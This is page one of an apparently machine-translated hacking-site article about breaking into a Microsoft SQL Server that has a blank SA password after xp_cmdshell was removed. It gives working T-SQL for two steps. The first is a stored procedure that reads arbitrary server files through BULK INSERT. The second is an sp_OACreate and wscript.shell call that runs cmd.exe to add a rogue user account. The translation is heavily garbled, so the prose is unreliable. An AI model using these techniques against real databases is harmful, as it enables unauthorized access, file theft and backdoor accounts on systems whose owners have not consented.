Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > invades the examination > Content
Hot Articles
ForensicSIM Toolkit gets
Serv-U bounce attack and
To the Image File Execut
Based on CallStack count
To a some music website
How to use double WAN ro
pcshare official net exa
Security precious book m
Honey jar and honey net
The invasion examination
pcshare official net exa
Tomcat invasion examinat
Bypasses the CallStack f
Ten big invasion examina
The network invasion exa
Recommend Articles
Only opens 80 port's saf
Bypasses the web key wor
Bypasses the CallStack f
Security precious book m
Based on CallStack count
pcshare official net exa
SQL Server SA idle talk
Honey jar and honey net
The invasion examines th
Four next generation inv
An accidental invasion e
The invasion examines (I
How to use IDS to invade
The invasion examination
A winding safe examinati
New Articles
TEA guidelines for risk
Training for medical per
JSIC Security Forum 2001
SITO includes E-Learning
The rationale for choosi
Drink and drug driving c
BTEC is Tavcom Training
International trade issu
1 in 5 companies is unli
New compact PD-350 for F
sharp rise in prices of
Passfaces strong authent
T3i teams with Passfaces
Comodo Two Factor Authen
Comfortable two-factor a
SQL Server SA idle talk command seepage test
  Add date: 07/11/2008   Publishing date: 07/11/2008   Hits: 16
Total 2 pages, Current page:1, Jump to page:
 
The friend looked for me couple days ago, lets me help to test their server, after undergoing the scanning, discovered that SQLServer SA is spatial, decided that uses this crack to make the seepage test. Was deleted after test discovery memory process Xp_cmdshell as well as the read registry series's memory process, and Xplog70.dll is also deleted, therefore was unable to carry out CMD to order and to clone the manager account number, underwent the safe disposition evidently, this kind of situation the knowledge which at that time grasped according to me does not have the means invasion. Before also has met the similar machine, therefore the decision uses several day to solve this problem.

    After two day-long consult material and the test, realized have not needed to use any SQLServer bringing the memory process to be possible to obtain type document and so on txt, asp from the target machine contents (premise are knew that SA password or SA password for spatial), realized the process is establishes one to be near the watch, then read the document in the table, used the SELECT sentence to obtain the returns value again, namely document content. We may in inquire in the analyzer to read in a memory process first, then the execution, in the time which needs, so long as transfers this memory process then:

Create proc sp_readTextFile @filename sysname
as

    begin
    set nocount on
    Create table #tempfile (line varchar(8000))
    exec ('bulk insert #tempfile from “' + @filename + '“')
    select * from #tempfile
    drop table #tempfile
End
go


Like this so long as we carry out the similar following sentence to be possible to obtain assign under the way the document content:

exec sp_readTextFile 'c:\aaa.asp'
 


After realizing this function, this plan through reads on the friend server the website asp code, makes the further invasion, but afterward discovered that because does not know the website asp document the absolute way, therefore this function basic with, is forced to give up, in addition looks for other methods. Several days after this, I had thought the use security article mentions the OLE related a series of memory process frequently, this a series of memory process with Xp_cmdshell as well as read registry series memory process same danger, but its application method does not look like these memory process introduces such much in the network and the book, this series memory process has sp_OACreate, sp_OADestroy, sp_OAGetErrorInfo, sp_OAGetProperty, sp_OAMethod, sp_OASetProperty, sp_OAStop, below I speaks the application method which obtains through the consult material:

Opens inquires the analyzer, then uses SA and the target machine connects, in inquires in the analyzer to carry out:


DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell', @shell OUTPUT EXEC
SP_OAMETHOD @shell, 'run', null, 'c:\WINNT\system32\cmd.exe /c net user
ceshi 1 /add '--


Such opposite party system increased user named ceshi, the password is 1 user, carries out again:

 
Other pages: : 1 * 2 * Next>>
Prev:pcshare official net examination Next:Honey jar and honey net against black blockade invasion examination

Comment:

Category: Home > invades the examination
Home